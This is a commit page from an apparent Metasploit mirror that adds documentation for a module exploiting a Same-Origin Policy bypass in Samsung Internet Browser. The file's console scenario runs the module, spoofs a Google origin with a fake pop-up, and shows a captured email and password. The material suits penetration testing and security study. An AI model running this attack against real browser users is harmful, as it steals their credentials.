infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create samsung_browser_sop_bypass.md

MS-2855/keylogger-mettle-extension
RootUp 2017-12-16 22:26:08 +05:30 committed by GitHub
parent 36a3088a67
commit 6b54fe6775
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 57 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md Normal file
View File

@ -0,0 +1,57 @@
## Description
This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
## Vulnerable Application
This Modules was tested on Samsung Internet Browser 5.4.02.3 during development of this module.
## Verification Steps
1. Start `msfconsole -q`
2. `use auxiliary/gather/samsung_browser_sop_bypass`
3. `set SRVHOST`
4. `set SRVPORT`
5. `set URIPATH`
6. `set TARGET_URL`
5. `run`
## Scenarios
```
$ sudo msfconsole -q
msf > use auxiliary/gather/samsung_browser_sop_bypass
msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104
SRVHOST => 192.168.1.104
msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090
SRVPORT => 9090
msf auxiliary(samsung_browser_sop_bypass) > set URIPATH /
URIPATH => /
msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.com/csi
TARGET_URL => https://www.google.com/csi
msf auxiliary(samsung_browser_sop_bypass) > run
[*] Auxiliary module execution completed
msf auxiliary(samsung_browser_sop_bypass) >
[*] Using URL: http://192.168.1.104:9090/
[*] Server started.
[*] 192.168.1.101: Request 'GET /'
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
[*] 192.168.1.101: Request 'GET /favicon.ico'
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
[*] 192.168.1.101: Request 'GET /favicon.ico'
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword
msf auxiliary(samsung_browser_sop_bypass) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
emailID MyStrongPassword https://www.google.com/csi Password
msf auxiliary(samsung_browser_sop_bypass) >
```
## Demos
Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`